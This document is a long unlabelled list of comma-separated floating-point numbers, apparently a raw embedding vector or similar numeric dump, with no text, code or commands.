-0.01870453730225563, -0.012863305397331715, -0.0026431181468069553, -0.017523694783449173, -0.007277923170477152, 0.010163113474845886, -0.01728752627968788, -0.02593129128217697, 0.02621469274163246, -0.014941588044166565, -0.01408350933343172, 0.001998575171455741, -0.0024797681253403425, -0.01873602718114853, -0.006234846077859402, -0.004959536250680685, 0.028828289359807968, -0.027001921087503433, 0.01508328877389431, 0.014099253341555595, 0.012099694460630417, -0.019082406535744667, -0.028277229517698288, -0.0005185864283703268, 0.014752652496099472, 0.023947475478053093, 0.005183896515518427, 0.0209402646869421, -0.008281638845801353, -0.002946200780570507, -0.001178873935714364, -0.017145825549960136, -0.01354819443076849, -0.0040620965883135796, -0.00019520794739946723, 0.004876877646893263, 0.028371697291731834, -0.010478004813194275, -0.016563277691602707, 0.020247504115104675, -0.0068292031064629555, 0.017712630331516266, -0.026151714846491814, 0.02761595882475376, 0.039833735674619675, -0.00502251461148262, 0.02766319178044796, 0.0009254849283024669, 0.020436439663171768, -0.010926724411547184, -0.029977641999721527, 0.004317945800721645, 0.014217337593436241, -0.0003830356290563941, -0.017759863287210464, -0.011328211054205894, -0.004924111068248749, -0.021412601694464684, 0.015461158007383347, 0.008368234150111675, 0.0003038208233192563, 0.00838397815823555, 0.0035917276982218027, 0.001613817410543561, -0.002467959886416793, 0.026466606184840202, -0.005687722470611334, -0.004802091047167778, 0.004365179222077131, 0.004278584383428097, 0.010178858414292336, 0.013689895160496235, 0.0021314199548214674, 0.001092278864234686, 0.0053610228933393955, 0.010462259873747826, -0.01510690525174141, 0.021066222339868546, -0.0029599773697555065, 0.013367131352424622, 0.0007522947853431106, -0.007065371610224247, -0.013201814144849777, 0.004687943030148745, -0.028828289359807968, 0.022231319919228554, -0.008777592331171036, -0.0009023601305671036, -0.012823943980038166, -0.002869446063414216, 0.006656012963503599, -0.0013432077830657363, -0.00538070360198617, 0.004152627661824226, 0.01621689647436142, -0.007159838918596506, -0.0014278348535299301, -0.01621689647436142, 0.010525238700211048, 0.007781749125570059, 0.0307648703455925, 0.021664515137672424, 0.014311805367469788, -0.002944232663139701, 0.01202097162604332, 0.0005053019849583507, 0.015823282301425934, -0.0195389986038208, 0.02259344421327114, 0.005420065019279718, 0.004739112686365843, -0.011879270896315575, 0.03208741545677185, 0.023286204785108566, -0.008966526947915554, 0.0017446940764784813, -0.0026352456770837307, 0.012918411754071712, -0.01410712581127882, 0.007250369992107153, -0.011123531498014927, -0.005179960280656815, -0.003091837977990508, 0.0265138391405344, -0.013886702246963978, 0.007714834529906511, -0.0002386284904787317, 0.0041093300096690655, 0.027253834530711174, 0.0167207233607769, -0.01383159589022398, -0.0006725879502482712, 0.015563498251140118, -0.011485656723380089, -0.0008398738573305309, 0.0078093018382787704, -0.0013825692003592849, -0.01383159589022398, -0.010808640159666538, 0.001997590996325016, 0.001972990110516548, -0.0010981831001117826, 0.01283181644976139, -0.0008728390675969422, 0.0041093300096690655, 0.013855213299393654, 0.0023892370518296957, -0.008313127793371677, -0.018499858677387238, 0.0010637418599799275, -0.005038259085267782, -0.004333690274506807, -0.004373051691800356, -0.002342003397643566, 0.008486318401992321, 0.01958623342216015, -0.010289070196449757, -0.018011776730418205, -0.00891929306089878, -0.0018086563795804977, -0.010218219831585884, -0.0031036464497447014, -0.03101678378880024, -0.004369115456938744, 0.02344365045428276, -0.02042069472372532, -0.0118556534871459, 0.008761847391724586, -0.005278363823890686, -0.005010706372559071, 0.010737789794802666, 0.01591775007545948, 0.021995151415467262, -0.02292408049106598, -0.009139717556536198, 0.012202033773064613, 0.021286645904183388, 0.023947475478053093, -0.0032551877666264772, 0.0003380160196684301, -0.002406949643045664, -0.0022416317369788885, 0.029316371306777, 0.0038652895018458366, -0.009706521406769753, 0.015130522660911083, -0.009242056868970394, 0.0022278553806245327, -0.007301539648324251, -0.009194822981953621, 0.0007793557597324252, -0.012194162234663963, -0.004172308370471001, 0.022766634821891785, -0.005073684733361006, 0.019192619249224663, 0.007864408195018768, -0.016264131292700768, -0.006427716929465532, 0.003932204097509384, -0.012233523651957512, -0.001887379214167595, -0.010265453718602657, -0.007360581774264574, -0.014965204522013664, 0.003389016492292285, 0.010698428377509117, -0.018657304346561432, -0.017791353166103363, -0.023585351184010506, -0.005073684733361006, 0.0028576375916600227, 0.006919734179973602, 0.014154359698295593, 0.0118556534871459, 0.00019791403610724956, 0.002042856765910983, -0.02712787687778473, -0.006455269642174244, -0.013784362934529781, 0.010462259873747826, 0.035614196211099625, -0.006577290128916502, -0.018846238031983376, -0.009438863955438137, 0.033126555383205414, -0.003150880103930831, 0.006447397638112307, -0.002808435820043087, 0.007569197565317154, 0.009391630068421364, 0.03293761983513832, 0.011194382794201374, 0.004436030052602291, -0.02846616506576538, -0.0017456781351938844, 0.009391630068421364, 0.005652297288179398, -0.00613644253462553, 0.0004238730762153864, 0.008990144357085228, 0.010572472587227821, -0.009218440391123295, -0.007238561753183603, 0.002731681102886796, 0.0049162390641868114, 0.023900242522358894, 0.004931983537971973, 0.007525899913161993, 0.008903549052774906, 0.01509903371334076, -0.017177315428853035, 0.01678370125591755, 0.007840790785849094, 0.012501181103289127, 0.005270491354167461, -0.00016433384735137224, 0.02375854179263115, 0.008832698687911034, -0.014965204522013664, -0.0009746866999194026, -0.009942689910531044, -0.004837516229599714, 0.015736687928438187, -0.020168781280517578, 0.019145384430885315, 0.006671757437288761, -0.002562427194789052, -0.005498787853866816, 0.0028320527635514736, -0.013375003822147846, -0.016083069145679474, -0.020830053836107254, 0.0013796171406283975, 0.012028844095766544, 0.015154139138758183, -0.008998015895485878, 0.013926063664257526, 0.01505967229604721, 0.018279435113072395, 0.026466606184840202, -0.005364959128201008, 0.0004912794684059918, -0.0013766649644821882, 0.015618603676557541, 0.024923639371991158, 0.018610069528222084, -0.0017437100177630782, 0.014689674600958824, 0.004924111068248749, -0.005695594474673271, 0.0044439020566642284, -0.009856094606220722, -0.026435116305947304, 0.0026844474487006664, -0.0029521051328629255, -0.020467927679419518, 0.027789149433374405, -0.0012251236476004124, -0.009627798572182655, -0.008147809654474258, -0.0018184967339038849, 0.006604842841625214, 0.004723368212580681, -0.009950562380254269, -0.0016728595364838839, -0.004471455235034227, -0.0011060553370043635, -0.0042313504964113235, 0.006376546807587147, -0.031426142901182175, 0.00018376854131929576, 0.016547532752156258, 0.010706300847232342, 0.0034303460270166397, -0.0066599491983652115, -0.010241836309432983, -0.005274427589029074, 0.025474699214100838, -0.014705419540405273, 0.02427811175584793, -0.009462480433285236, -0.002863541943952441, 0.006667821202427149, -0.004199861548841, 0.007061435375362635, -0.000023386206521536224, 0.016043707728385925, 0.006656012963503599, -0.002818276174366474, 0.013650533743202686, -0.012808199971914291, -0.011123531498014927, 0.021947916597127914, 0.00991120096296072, 0.009399502538144588, 0.017240293323993683, 0.008163554593920708, -0.022530466318130493, -0.009116100147366524, -0.009155461564660072, -0.002143228193745017, -0.020782819017767906, -0.0010371728567406535, 0.014666058123111725, 0.03514185920357704, 0.02317599207162857, 0.02849765494465828, 0.013500960543751717, -0.000028936779926880263, -0.00195527751930058, -0.0011257360456511378, -0.024671725928783417, 0.006537928711622953, -0.014965204522013664, 0.03879459574818611, 0.013784362934529781, -0.028607865795493126, -0.014697547070682049, -0.008486318401992321, -0.005951443687081337, -0.01568158157169819, 0.010139496996998787, -0.012461819685995579, -0.0006376546807587147, -0.009682904928922653, 0.01983814500272274, 0.009100356139242649, -0.004656453616917133, -0.006687501911073923, 0.0023695563431829214, 0.009415247477591038, -0.00440454063937068, -0.0024443429429084063, -0.011233743280172348, 0.015311584807932377, 0.007565261330455542, 0.00529804453253746, -0.007226753048598766, 0.031142739579081535, 0.014988820999860764, 0.0014563718577846885, -0.00445964653044939, -0.018625814467668533, 0.0029245519544929266, -0.005203577224165201, -0.0053452784195542336, 0.009903328493237495, -0.00517208781093359, 0.006644204258918762, -0.03011934459209442, 0.02545895427465439, 0.0011995387030765414, -0.015964984893798828, 0.023601096123456955, 0.0056680417619645596, 0.006935478653758764, 0.010013540275394917, 0.02567937783896923, -0.004880813881754875, 0.005742828361690044, 0.01063545048236847, 0.024923639371991158, 0.012162672355771065, -0.028655098751187325, -0.00669931061565876, 0.01616966351866722, 0.004502944182604551, -0.008171427063643932, 0.008297382853925228, -0.02961551770567894, 0.02147557958960533, 0.027238089591264725, 0.002347907517105341, -0.006809522397816181, 0.0050421953201293945, 0.010997575707733631, -0.010706300847232342, 0.015138395130634308, 0.005262619350105524, 0.0010106039699167013, 0.0017466621939092875, 0.0195704884827137, 0.019365809857845306, 0.006498567294329405, -0.012650754302740097, 0.003629121230915189, -0.0038397046737372875, 0.001538046752102673, 0.0038633213844150305, -0.005317725241184235, -0.022388765588402748, 0.0042470949701964855, 0.005388575606048107, 0.007270050700753927, 0.002769074635580182, -0.015162011608481407, 0.023238971829414368, -0.01782284304499626, 0.016657745465636253, -0.009675032459199429, 0.005203577224165201, -0.029410839080810547, 0.010950341820716858, -0.008069086819887161, -0.016106685623526573, -0.001999559113755822, 0.015823282301425934, -0.032496772706508636, -0.0007547548739239573, -0.004510816652327776, -0.005203577224165201, -0.012524797581136227, 0.007919513620436192, 0.027584468945860863, 0.005593255162239075, 0.00606559170410037, 0.02681298553943634, -0.012579903937876225, -0.0033457190729677677, -0.024104921147227287, 0.0015596954617649317, -0.00013161468086764216, 0.0032394432928413153, -0.011942248791456223, 0.012855433858931065, -0.009131845086812973, -0.012690115720033646, 0.001897219568490982, 0.008057278580963612, 0.013469471596181393, 0.0026706710923463106, -0.024766193702816963, 0.0007350741652771831, -0.006959095597267151, 0.026309160515666008, 0.016295619308948517, 0.011682463809847832, -0.007943131029605865, 0.005636552348732948, 0.0167207233607769, -0.0022928016260266304, -0.01213118340820074, -0.021034732460975647, 0.003680290887132287, -0.02402619831264019, 0.0015961048193275928, 0.01549264695495367, 0.007907705381512642, -0.007805365603417158, 0.004491135943681002, 0.0059908051043748856, 0.0011139276903122663, -0.029804453253746033, -0.003928267862647772, 0.01591775007545948, 0.00023579939443152398, -0.006718990858644247, -0.0056837862357497215, 0.012406713329255581, -0.0016443225322291255, -0.014713292010128498, -0.016594765707850456, 0.013642661273479462, -0.016626255586743355, -0.02989891916513443, 0.006718990858644247, 0.0018116084393113852, 0.02624618262052536, -0.0020271120592951775, 0.02873382158577442, -0.0237427968531847, -0.010139496996998787, -0.01255628652870655, 0.008155682124197483, -0.006577290128916502, -0.014437762089073658, 0.004813899286091328, 0.020200271159410477, 0.022750889882445335, 0.007281858939677477, -0.010627578012645245, -0.018358157947659492, -0.0022180150263011456, 0.00474698469042778, 0.019334319978952408, -0.00006795991794206202, 0.010777151212096214, -0.02736404538154602, 0.01616966351866722, 0.008872060105204582, -0.006947287358343601, -0.021286645904183388, -0.022845357656478882, 0.006451333407312632, 0.01144629530608654, -0.004994961898773909, -0.008454828523099422, 0.015823282301425934, -0.0010834225686267018, 0.006809522397816181, 0.002800563583150506, 0.010352048091590405, 0.004148691426962614, -0.010139496996998787, -0.017397738993167877, 0.004699751269072294, -0.008155682124197483, 0.02042069472372532, 0.008470573462545872, -0.004813899286091328, -0.007797493599355221, -0.029709985479712486, -0.02901722490787506, 0.004408476874232292, 0.02456151321530342, -0.013280536979436874, 0.0036192808765918016, -0.002629341557621956, -0.008588657714426517, 0.012501181103289127, -0.0065221842378377914, 0.0036920993588864803, 0.01928708702325821, -0.0021471644286066294, 0.00468007056042552, -0.013815851882100105, -0.014130743220448494, -0.002633277792483568, 0.0009978115558624268, -0.01790156587958336, 0.0006032134406268597, -0.0077778128907084465, 0.007435368373990059, -0.01189501490443945, -0.006888245232403278, -0.02152281440794468, 0.00934439618140459, 0.018247945234179497, 0.02457725815474987, -0.004569858778268099, -0.00405028834939003, 0.006097081117331982, 0.00043469746015034616, 0.010108008049428463, 0.006900053471326828, -0.012737349607050419, 0.00510517368093133, -0.029127435758709908, 0.015201373025774956, 0.039487358182668686, -0.002111739246174693, -0.0063096326775848866, 0.012658626772463322, 0.008761847391724586, 0.0019867666997015476, 0.009824605658650398, -0.03181975707411766, -0.011367572471499443, 0.00643558893352747, -0.01788582094013691, -0.010706300847232342, -0.014461378566920757, 0.00482964375987649, 0.0034106653183698654, -0.028891267254948616, -0.01791730895638466, 0.028072550892829895, 0.014540101401507854, 0.005793998017907143, -0.020530907437205315, 0.008470573462545872, 0.008313127793371677, 0.019885379821062088, -0.023915987461805344, -0.0010706301545724273, -0.014839247800409794, -0.0057113394141197205, 0.02542746439576149, -0.0040620965883135796, -0.006301760207861662, -0.018657304346561432, 0.012083950452506542, -0.016988379880785942, 0.010084390640258789, 0.0020093994680792093, -0.008297382853925228, 0.014666058123111725, -0.007722706999629736, 0.02714362181723118, -0.0004772569809574634, -0.01270585972815752, 0.011454167775809765, -0.003784598782658577, 0.009045249782502651, -0.00923418439924717, 0.003666514530777931, 0.005577510688453913, 0.003202049992978573, -0.04213244467973709, -0.025600655004382133, 0.011225871741771698, 0.008801208809018135, 0.008210788480937481, -0.013768617995083332, -0.0002392435126239434, -0.018562836572527885, 0.004770601633936167, -0.002286897273734212, -0.0012507084757089615, 0.0034795477986335754, -0.0016512107104063034, 0.024970872327685356, 0.0066638849675655365, -0.015264350920915604, -0.008572912774980068, 0.009604182094335556, -0.018090499565005302, -0.011367572471499443, -0.010123752057552338, -0.013910318724811077, -0.006230909842997789, -0.029977641999721527, -0.013729256577789783, 0.016421576961874962, -0.005597191397100687, 0.011099915020167828, -0.009793116711080074, -0.009037377312779427, -0.004617092199623585, -0.009328652173280716, 0.0037275245413184166, 0.009186950512230396, -0.011643102392554283, 0.00895865447819233, -0.01757092960178852, 0.005463362205773592, 0.0044006044045090675, -0.010517366230487823, 0.010084390640258789, 0.002068441594019532, -0.036401424556970596, 0.007502282969653606, -0.021664515137672424, -0.0002834020706359297, 0.022388765588402748, 0.009273545816540718, 0.0020290801767259836, 0.01439840067178011, 0.007856535725295544, 0.015374562703073025, -0.0043966686353087425, -0.010848001576960087, 0.0069669680669903755, 0.006959095597267151, -0.0014366911491379142, 0.004707623738795519, 0.025144062936306, 0.0011582091683521867, 0.013996914029121399, -0.002863541943952441, 0.013005007058382034, 0.0005830407608300447, 0.009612053632736206, -0.0010056837927550077, 0.001211347058415413, -0.0014170104404911399, -0.009706521406769753, -0.003577951341867447, 0.00823440495878458, -0.005817614961415529, -0.007675473112612963, -0.015760304406285286, -0.010352048091590405, 0.0032925810664892197, -0.008010044693946838, -0.016311364248394966, 0.00447539146989584, 0.03762950003147125, -0.010328431613743305, 0.002930456306785345, -0.011406933888792992, 0.027175111696124077, 0.009194822981953621, -0.005605063401162624, 0.0020133357029408216, 0.007915577851235867, -0.0008969479240477085, 0.004664326086640358, 0.011438422836363316, 0.017098592594265938, -0.011485656723380089, 0.004979216959327459, -0.004845388233661652, -0.020767074078321457, -0.025537677109241486, 0.00867525301873684, 0.019066661596298218, 0.0195389986038208, 0.0014917970402166247, 0.007112605031579733, -0.024514280259609222, 0.005522404331713915, -0.0024207262322306633, -0.03216613829135895, 0.01986963488161564, -0.020200271159410477, 0.000023017193598207086, 0.00524293864145875, -0.0007035850430838764, -0.001135576399974525, -0.031079761683940887, -0.00732909282669425, -0.016594765707850456, -0.004101458005607128, -0.0073054758831858635, -0.023081526160240173, 0.0011719857575371861, -0.008572912774980068, 0.003934171982109547, -0.013713511638343334, 0.013760745525360107, -0.008226532489061356, 0.017224548384547234, 0.041187770664691925, -0.03753503039479256, -0.005203577224165201, 0.023081526160240173, -0.004034543409943581, 0.03413420543074608, 0.0003515465068630874, 0.0032492836471647024, 0.00432188156992197, 0.019066661596298218, -0.0030268917325884104, 0.0018145606154575944, -0.011548634618520737, -0.011650974862277508, 0.010170985944569111, -0.013067984953522682, -0.013249047100543976, -0.001280229538679123, 0.009588437154889107, -0.00029570251354016364, -0.00001620582588657271, 0.012241395190358162, -0.011934376321732998, -0.03262272849678993, 0.025805333629250526, -0.00795887503772974, 0.0025899801403284073, 0.0018922993913292885, 0.008069086819887161, -0.010328431613743305, 0.0034303460270166397, 0.012501181103289127, -0.0011326243402436376, 0.0025919482577592134, -0.019365809857845306, 0.011304594576358795, -0.020294738933444023, 0.0007503267261199653, -0.0018499857978895307, -0.0010853905696421862, -0.0032433795277029276, -0.020042825490236282, 0.006805586162954569, 0.005431873258203268, 0.002109771128743887, -0.01146991178393364, -0.008076959289610386, 0.00185293797403574, 0.005168152041733265, 0.010548855178058147, -0.0030505084432661533, -0.014854992739856243, -0.0030249236151576042, 0.006195484660565853, 0.004754857160151005, 0.0010224123252555728, 0.00704175466671586, -0.002568331314250827, 0.002058601239696145, 0.01355606596916914, -0.035330794751644135, 0.00440454063937068, 0.002347907517105341, -0.017759863287210464, 0.018531346693634987, -0.022561954334378242, 0.0006410988280549645, -0.004278584383428097, -0.012879050336778164, -0.007490474730730057, -0.0016344821779057384, -0.008376105688512325, -0.012548414058983326, 0.005975060630589724, 0.007592814043164253, -0.004514752421528101, 0.016374342143535614, -0.024986617267131805, 0.015122650191187859, -0.002034984529018402, 0.0237742867320776, -0.010328431613743305, 0.012784582562744617, 0.008801208809018135, 0.007006329484283924, 0.0012024907628074288, -0.02429385669529438, 0.006471014115959406, 0.011643102392554283, 0.026088736951351166, 0.009202695451676846, 0.00934439618140459, -0.0018430976197123528, 0.006030166521668434, 0.010848001576960087, -0.00003351869236212224, 0.009037377312779427, -0.00853355135768652, -0.024671725928783417, -0.0001816774602048099, -0.01479201391339302, 0.02626192569732666, 0.010887362994253635, 0.01174544170498848, -0.03577164188027382, 0.009549075737595558, 0.013036496005952358, 0.0034952922724187374, 0.015350946225225925, -0.0011090075131505728, -0.004298265092074871, 0.006785905454307795, 0.0014504676219075918, -0.003493324387818575, -0.0041211387142539024, -0.01675221137702465, -0.016122430562973022, 0.007092924322932959, 0.007222816813737154, -0.010997575707733631, -0.032811664044857025, 0.007498346734791994, 0.007734515238553286, 0.012611392885446548, -0.004845388233661652, -0.016846679151058197, -0.004794218577444553, 0.00825014989823103, 0.014949459582567215, -0.00047971706953831017, -0.018216455355286598, -0.014059891924262047, -0.004069969058036804, 0.0024640236515551805, 0.003030827734619379, -0.0027730106376111507, -0.0090846111997962, 0.004132946953177452, -0.016138173639774323, -0.016020089387893677, 0.011391188949346542, -0.007073243614286184, 0.021963661536574364, -0.005542085040360689, -0.003757045604288578, 0.010501621291041374, 0.005731020122766495, -0.025836823508143425, -0.0024620555341243744, 0.003339814953505993, 0.000025769417334231548, 0.018531346693634987, -0.007927386090159416, -0.001980862580239773, -0.008596530184149742, 0.015964984893798828, 0.01706710271537304, -0.01061970554292202, 0.010375665500760078, -0.001580360229127109, 0.016815191134810448, 0.009328652173280716, 0.013060112483799458, 0.00991907250136137, -0.0029698177240788937, 0.005148471333086491, -0.01510690525174141, -0.005364959128201008, 0.006167931482195854, 0.015846900641918182, -0.012477563694119453, 0.022530466318130493, -0.020467927679419518, -0.013800106942653656, -0.0038475769106298685, 0.010769279673695564, 0.006223037373274565, 0.009257801808416843, -0.0237900298088789, -0.013650533743202686, -0.003723588539287448, 0.01621689647436142, -0.01653178781270981, 0.018499858677387238, -0.0042431592009961605, -0.004979216959327459, -0.00018561360775493085, -0.0014229146763682365, 0.029473816975951195, 0.005813678726553917, -0.007427496369928122, 0.01146991178393364, -0.002613597083836794, -0.010352048091590405, -0.002355779753997922, 0.00247780024074018, -0.020609630271792412, 0.00753377191722393, 0.042888183146715164, 0.016657745465636253, 0.008596530184149742, -0.04099883511662483, -0.0209402646869421, -0.0008536503883078694, -0.0111707653850317, 0.015162011608481407, 0.007848663255572319, -0.010564600117504597, -0.005888465326279402, 0.01535881869494915, -0.004014862701296806, -0.004152627661824226, 0.012886922806501389, 0.0016256258822977543, 0.009730137884616852, 0.014768397435545921, -0.01019460242241621, 0.01675221137702465, 0.020515162497758865, -0.004380923695862293, 0.03211890161037445, 0.01587838865816593, -0.01505967229604721, 0.016279876232147217, 0.007423560135066509, 0.007915577851235867, 0.0222942978143692, -0.01979091204702854, 0.02038920484483242, 0.010438643395900726, -0.01535881869494915, -0.0004002562491223216, 0.017539439722895622, -0.01312309131026268, 0.0006543832714669406, -0.0026608307380229235, 0.00432188156992197, 0.0022258872631937265, 0.0009382774005644023, 0.005046131554991007, 0.00741175189614296, 0.014052020385861397, -0.038133323192596436, 0.026986176148056984, -0.0007345821359194815, 0.01782284304499626, 0.010289070196449757, -0.000909740396309644, 0.01980665698647499, 0.010170985944569111, 0.01923985220491886, -0.02712787687778473, 0.012461819685995579, -0.0001397329760948196, -0.005404320079833269, 0.0055302768014371395, -0.010572472587227821, 0.006337185390293598, 0.012178417295217514, -0.0019188682781532407, 0.01340649276971817, 0.0019267405150458217, -0.002725776983425021, -0.011918632313609123, -0.032811664044857025, 0.0060341027565300465, 0.00468007056042552, -0.006612715311348438, -0.001911979983560741, -0.01493371557444334, -0.021932171657681465, -0.013855213299393654, -0.010084390640258789, 0.003570079104974866, -0.019696444272994995, -0.00963567104190588, 0.0018175126751884818, -0.00010898187611019239, -0.0050264508463442326, -0.0033240702468901873, -0.008706741966307163, 0.03211890161037445, -0.0139732975512743, 0.011249488219618797, 0.011005447246134281, 0.001896235509775579, 0.008824826218187809, -0.03520483523607254, -0.013390748761594296, -0.006364738568663597, 0.015028182417154312, -0.02879680134356022, 0.0019759424030780792, -0.0060183582827448845, 0.005522404331713915, -0.0223415307700634, 0.0016433384735137224, 0.010202474892139435, 0.005648361053317785, -0.015193500556051731, 0.008596530184149742, -0.010556727647781372, 0.006990584544837475, -0.01382372435182333, -0.011690336279571056, 0.006112825591117144, 0.014225210063159466, 0.011225871741771698, 0.024655980989336967, 0.018027521669864655, -0.01840539090335369, 0.018043266609311104, 0.007828982546925545, 0.0025270020123571157, 0.01174544170498848, -0.004943791776895523, -0.0009530379320494831, 0.00247780024074018, 0.009123972617089748, 0.006652076728641987, -0.007033882196992636, 0.013060112483799458, 0.013099473901093006, 0.0030367320869117975, -0.02147557958960533, 0.0008915357175283134, 0.0031213590409606695, -0.007738451473414898, -0.005404320079833269, 0.015728816390037537, -0.022750889882445335, 0.009092483669519424, -0.008753975853323936, 0.010580344125628471, 0.008013981394469738, 0.0030288598500192165, -0.013367131352424622, 0.0016689234180375934, -0.0034795477986335754, 0.038416728377342224, 0.003906618803739548, -0.0015961048193275928, -0.02265642210841179, -0.0265453290194273, 0.0010106039699167013, -0.008139938116073608, -0.01006077416241169, -0.0006548753008246422, 0.026151714846491814, 0.003766885958611965, -0.00950971432030201, -0.02092451974749565, 0.0008251133840531111, 0.02150706946849823, 0.017381994053721428, -0.009982051327824593, -0.0034224737901240587, -0.015587114728987217, -0.020042825490236282, 0.0032473155297338963, 0.0014711323892697692, -0.015004565939307213, -0.012375224381685257, -0.006935478653758764, -0.007813237607479095, 0.009249929338693619, 0.006608779076486826, -0.0307176373898983, -0.0007965763215906918, -0.005833359435200691, -0.028072550892829895, 0.006081336177885532, 0.027490003034472466, 0.012265012599527836, 0.003432314144447446, 0.005305917002260685, 0.030245300382375717, -0.003152848221361637, 0.0012851497158408165, -0.021176433190703392, 0.004648581612855196, -0.004975281190127134, -0.004754857160151005, -0.002588012022897601, 0.02602575719356537, 0.011737569235265255, -0.01479201391339302, 0.005341342184692621, -0.008116320706903934, 0.01648455485701561, -0.0035582706332206726, 0.0006622555665671825, -0.004089649301022291, 0.025521932169795036, 0.007738451473414898, -0.009123972617089748, -0.010785023681819439, 0.0009869871428236365, 0.016909657046198845, 0.011713952757418156, -0.000807400734629482, -0.007773876655846834, 0.0053610228933393955, 0.014736908487975597, 0.004774537868797779, 0.015303712338209152, -0.01567371003329754, -0.0016964763635769486, -0.00656154565513134, 0.01314670778810978, 0.000015129538041946944, 0.023301949724555016, 0.026041502133011818, 0.010832257568836212, 0.0032630600035190582, 0.014752652496099472, 0.010037156753242016, -0.0014593239175155759, -0.02007431350648403, -0.02456151321530342, 0.01590987853705883, 0.004317945800721645, -0.005931762978434563, 0.002176685491576791, 0.008431212045252323, -0.016594765707850456, -0.018893472850322723, 0.0036192808765918016, 0.003426410024985671, 0.015846900641918182, 0.0006465109763666987, -0.0017387898406013846, 0.0042470949701964855, 0.02456151321530342, -0.002914711833000183, -0.006888245232403278, 0.010989703238010406, 0.01269798818975687, -0.0012310277670621872, -0.005778253544121981, -0.028434675186872482, 0.009320779703557491, -0.007899832911789417, 0.01651604287326336, 0.01845262385904789, -0.005671977996826172, 0.0181692223995924, -0.014162232168018818, -0.01184778194874525, 0.01549264695495367, 0.012658626772463322, 0.03098529390990734, -0.018814750015735626, 0.012674370780587196, 0.022687911987304688, -0.011217999272048473, 0.006408036220818758, 0.008006108924746513, 0.009682904928922653, 0.017996031790971756, -0.013839468359947205, 0.027049154043197632, 0.014185848645865917, 0.004005022346973419, 0.005750700831413269, 0.0023282268084585667, 0.007510155439376831, -0.025474699214100838, 0.016893913969397545, 0.024797681719064713, 0.000034318221878493205, 0.022672167047858238, 0.0007272018701769412, -0.0076282392255961895, 0.003286676947027445, 0.006683565676212311, 0.016043707728385925, 0.011406933888792992, 0.02207387425005436, -0.009738010354340076, 0.0018116084393113852, -0.0026805114466696978, 0.003731460776180029, -0.013729256577789783, 0.0023872689343988895, -0.008124193176627159, -0.008856315165758133, 0.0037767263129353523, 0.07280284911394119, 0.015051799826323986, -0.0025486506056040525, -0.0019159162184223533, 0.003790502902120352, 0.006427716929465532, -0.025884056463837624, 0.020845796912908554, -0.0071204775013029575, -0.006282079499214888, -0.0060026138089597225, 0.007514091208577156, 0.0032473155297338963, -0.0009072803077287972, -0.01439840067178011, 0.00020824640523642302, 0.019161129370331764, 0.0009328651940450072, 0.0013756809057667851, 0.002792691346257925, 0.009675032459199429, -0.024152155965566635, 0.01651604287326336, 0.0030544446781277657, 0.009171206504106522, -0.014296060428023338, 0.0018568740924820304, -0.015130522660911083, -0.02037346176803112, -0.0011837941128760576, -0.0016531788278371096, 0.006856755819171667, -0.011375444941222668, -0.016114557161927223, -0.002485672477632761, -0.00038352765841409564, 0.0010214283829554915, -0.00020504830172285438, -0.012091821990907192, 0.010052901692688465, -0.008053342811763287, 0.0050579397939145565, -0.005892401561141014, 0.00445964653044939, -0.013949680142104626, -0.008667380549013615, 0.0017309176037088037, -0.0008359377388842404, -0.01983814500272274, -0.00013112266606185585, -0.01479201391339302, 0.012792455032467842, -0.002851733472198248, 0.013012878596782684, -0.004054224118590355, -0.006758352275937796, -0.013705640099942684, 0.008620146661996841, 0.010170985944569111, -0.006781969219446182, 0.016972636803984642, -0.004333690274506807, -0.009879712015390396, 0.010352048091590405, 0.008580785244703293, -0.010690556839108467, -0.002015303820371628, 0.014130743220448494, 0.006927606649696827, 0.021034732460975647, 0.011052681133151054, -0.018799005076289177, -0.00469187879934907, 0.003810183610767126, 0.004227414261549711, -0.005652297288179398, -0.007498346734791994, 0.0062033566646277905, -0.0015596954617649317, 0.007907705381512642, 0.040904369205236435, -0.021884938701987267, -0.013666278682649136, 0.027159366756677628, 0.008195043541491032, -0.007581005804240704, -0.021711748093366623, 0.028135528787970543, -0.0014376752078533173, 0.01897219568490982, -0.011202254332602024, -0.018578581511974335, -0.025506187230348587, -0.007183455396443605, 0.03268570825457573, -0.007899832911789417, -0.0062033566646277905, 0.004483263473957777, 0.012123310938477516, -0.013493088074028492, 0.0009245008695870638, 0.007250369992107153, 0.014059891924262047, 0.0139732975512743, -0.007419623900204897, 0.0064946310594677925, -0.02147557958960533, -0.005132726859301329, 0.01955474354326725, -0.003127263393253088, -0.00599867757409811, -0.009564820677042007, -0.004294328857213259, -0.009328652173280716, -0.00989545602351427, 0.0016285779420286417, 0.003906618803739548, -0.04887111485004425, 0.030544446781277657, 0.001837193383835256, 0.02289259061217308, 0.027190854772925377, 0.003056412795558572, 0.0017633907264098525, 0.00035794274299405515, -0.004502944182604551, 0.007939194329082966, 0.005778253544121981, -0.02125515602529049, -0.016972636803984642, -0.0011168797500431538, 0.014650313183665276, 0.023380672559142113, 0.0018942673923447728, 0.05891614407300949, 0.013626917265355587, 0.005266555584967136, 0.0064788865856826305, 0.007222816813737154, -0.0036310891155153513, 0.0011158956913277507, -0.013288408517837524, -0.02319173701107502, -0.004058160353451967, -0.005136662628501654, -0.0004024703230243176, 0.0222942978143692, 0.0034047611989080906, -0.013524577021598816, 0.01815347746014595, 0.0034893881529569626, -0.00502251461148262, -0.016673488542437553, -0.016374342143535614, -0.0013727288460358977, 0.00746685778722167, 0.0045659225434064865, 0.0030111472588032484, 0.014272443950176239, 0.027726171538233757, 0.0042589036747813225, 0.023553861305117607, 0.021302390843629837, -0.05749913305044174, 0.0034952922724187374, 0.002338067162781954, 0.011918632313609123, 0.01650029979646206, 0.020877286791801453, 0.007077179849147797, -0.007537708152085543, 0.01678370125591755, -0.008124193176627159, -0.024246621876955032, 0.016279876232147217, -0.007817174308001995, -0.017460716888308525, -0.015744559466838837, -0.003861353499814868, -0.0018263689707964659, -0.018326668068766594, -0.006959095597267151, 0.011391188949346542, 0.0050854929722845554, -0.010446515865623951, 0.011784803122282028, 0.010533111169934273, -0.012406713329255581, 0.0045659225434064865, -0.027190854772925377, -0.0002503138966858387, -0.014917970634996891, -0.009612053632736206, 0.0032394432928413153, 0.012383096851408482, -0.02657681703567505, 0.017759863287210464, 0.008927165530622005, -0.013020751066505909, 0.01549264695495367, 0.010068646632134914, 0.008076959289610386, -0.011060553602874279, 0.003081997623667121, 0.013225430622696877, -0.004971344955265522, -0.017381994053721428, -0.0036920993588864803, -0.005451553966850042, -0.015594987198710442, 0.018326668068766594, -0.021396856755018234, 0.0050421953201293945, 0.00373933301307261, -0.005156343337148428, -0.01314670778810978, 0.005424000788480043, -0.008218660019338131, 0.0013815851416438818, 